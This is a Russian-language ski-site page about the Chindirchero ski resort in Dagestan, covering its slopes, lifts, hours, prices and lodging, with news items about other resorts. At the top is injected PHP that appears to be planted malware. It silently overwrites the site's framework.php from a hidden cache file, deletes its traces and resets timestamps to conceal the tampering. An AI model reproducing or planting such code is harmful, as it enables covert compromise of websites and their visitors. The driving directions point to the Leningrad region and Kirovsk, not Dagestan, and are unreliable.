$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Чиндирчеро | горнолыжки
Баннер

Чиндирчеро

Описание

Обсудить на форуме...

Посмотреть красивые фото

[Чиндирчеро на карте ]

Горнолыжный комплекс «Чиндирчеро» располагается у подножья одноименной горы. В нескольких километрах от сел  Гинта Акушинского района Дагестана. Самая высокая точка курорта 2498м. над уровнем моря. Благоприятные ландшафты и климатические условия, удивительные горные пейзажи, это главные достопримечательности горнолыжного комплекса «Чиндирчеро». На территории курорта проводяться различные соревнования и тренировочные занятия по нескольким видам спорта круглый год. Некоторые отзывы можно почитать на форуме.

Зимой здесь никогда не бывает недостатка снега. Ширина трасс начинается от 300м. и доходит до километра! Кроме горных лыж и сноуборда на курорте «Чиндирчеро» можно заняться также и другими экстремальными видами спорта: скалолазание, парапланеризм, рафтинг и кайтсерфинг.

Но прежде чем отправляться на курорт посмотрите что твориться с погодой и что на трассах.

Характеристики склонов

На горнолыжном курорте есть трассы различной степени сложности, но главная особенность курорта это обширные территории для фритредеров. Можно подняться на верхушку горы на снегоходе, на высоту 2500м. затем спускаться по целинному склону! Незабываемые впечатления и море адреналина гарантировано! Общая длинна подготовленных трасс более 4000м.

Тип курорта: горнолыжный
Сезон катания: с декабря по апрель

Подъемники

Для того, чтобы добраться до вершины необходимо использовать целых четыре! бугельных подъёмника. А в завершении часть склона преодолеть на снегоходе. В этом основной минус курорта. Если едите за комфортом то вам явно не на этот курорт. Развитие остановилось где то в советские годы.

Всего : 8
Гондольных: 0
Кресельных: 0
Бугельных: 8

Склоны

Перепад высот: 500м (если подыматься на снегоходе)
Трасс/подъемников:10\5
Протяженность трасс: 4 000 м
Ночное освещение: на 4 трассах по 250м.
Искусственное оснежение:
присутствует на трассе в 500м.

Сложность трасс

Зелёные: 70%
Красные: 25%
Черные: 5%

Время работы

Понедельник: с 13:00 до 17:00.
Вторник, среда, четверг, воскресенье: с 9:30 до 17:00.
Пятница, суббота: с 9:30 до 23:00.

Удобства

Обучение катанию на сноуборде и горных лыжах, удобное кафе самообслуживания на 200 человек, вечером проводиться дискотека. Для самых требовательных гостей есть ресторан на 100 человек с видом на склоны горы. Бесплатная парковка.

Размещение

3 гостиницы с номерами разной комфортности и достумом к WI-FI. Цены зависят от дня (выходной или будний) и колеблются от 200руб. до  600руб.  сут\чел

Как добираться

Как доехать до ГЛЦ Чиндирчеро

[ГЛЦ Чиндирчеро на карте]

самолётом

До аэропорта Махачкала. Затем на автобусе или такси до села Гинта. Так же можно заказать трансфер в гостинице курорта.

поездом

До Махачкалы или Каспийска затем 200км до курорта на такси или автобусе до село Гинта 

на автобусе

Не рекомендуется.

на автомобиле

По трассе Р123 до Ленинградской области, затем до Никольского(20км) - Отрадного(7км) и наконец до Кировска

Контакты

Республика Дагестан, горноклиматический курорт «Чиндирчеро», Акушинский район, село Гинта.     
Тел.: 8 722 67 12 42.

Цены

Чиндирчеро Цены

Будние дни с 10 до 17:00 - > взрослый 250 руб. > детский 150руб.
Выходные и праздники с 10.00 до 17.00 - > взрослый 600 руб. > детский 300руб.

Коментарии:

 
.

Последние новости

Популярные статьи

Новости
Открытие сезона на ГЛЦ "Царевщина"

Ну вот и дождались любители горных лыж и сноуборда открытия ГЛЦ "Царевщина". Сегодня был полноценный рабочий день на этом комплексе. Снегу накидали достаточно, земли нигде не видно. В некоторых местах есть лёд. Народу немного, на подъёмнике очередей нет. Цены остались на уровне прошлого сезона: 1 смена с 10 до 15 - 600р, 2 смена с 13 до 17 - 700р, 3 смена с 17 до 21 - 300р (в выходные дни). В будние дни соответственно 250 - 300 - 200руб. Работает как всегда только центральная трасса.

 
Новости ГЛК Красная глинка

По заявлениям представителей ГЛК  Красная Глинка, что неподалёку от Самары, открытие намечено не 2 декабря, в настоящее время активно идёт подготовка склонов. На Юге убрали не работающий подъемник, трасса стала шире. Сейчас снежат Восточный склон. К открытию скорее всего будут работать Центр, Восток и если успеют то и Юг.

 
Появился новый раздел "Народный магазин"
Подробнее ...
Чиндирчеро | горнолыжки

Как доехать на машине
*От:
*До:
Дай +1 :)
Сохранить в моб...
Яндекс.Метрика